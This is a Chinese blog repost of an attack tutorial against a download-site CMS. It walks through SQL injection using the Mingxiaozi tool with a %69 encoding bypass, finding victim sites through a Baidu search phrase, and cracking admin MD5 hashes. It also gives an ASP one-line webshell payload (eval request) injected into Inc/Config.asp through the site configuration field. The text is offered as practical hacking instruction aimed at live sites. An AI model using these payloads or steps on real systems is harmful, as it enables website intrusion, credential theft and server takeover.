鬼仔's Blog

鬼仔注：未测试。不知道是不是新东西，对这两个系统没什么印象。看文章内容好像是从某个动画的说明文件的内容。不知道原作者是谁。

来源：失眠ヤ夜 's blog

一个注入漏洞

大家可以快进看
先随便点一个软件下载
官方都更新到2.4了，但是还是官方自己再用，不过也有漏洞哦
把下载地址复制到明小子里面，把I改成%69
看到了吗，没有改之前是不能注入额
恭喜,该URL可以注入!
数据库类型:Access数据库

下面来讲讲关键字的搜索
下载链接若长时间无响应，请稍候再试；无法下载或是其它问题，请给我留言…..就是这一句了
在BAIDU上搜搜看

我在本机上测试的
Admin_Info
是管理员表
密码是MD5加密的，在WWW.CMD5.COM上可以解密
郁闷。。。。不知道为什么本机老跑不出来
反正我知道密码啦，下面开始拿webshell
如果你们猜的话一定可以猜出来的
本机猜出来了
有些后台是ADMIN.ASP
还有的是LOGIN.ASP
版本不同啦
后台有两种方法拿WEBSHELL
看我演示
OK，这是第一种
下面讲第二种
在网站配置信息里
插入一句话
不是光查
<%eval request("#")%>
这样是不行的
看演示
sss"%><%eval request("#")%><%ViewMessage="c
下载说明里面写上上面的一句话
我都已经写好了
http://localhost/down/Inc\Config.asp

这个是我一句话的地址
然后连接就可以了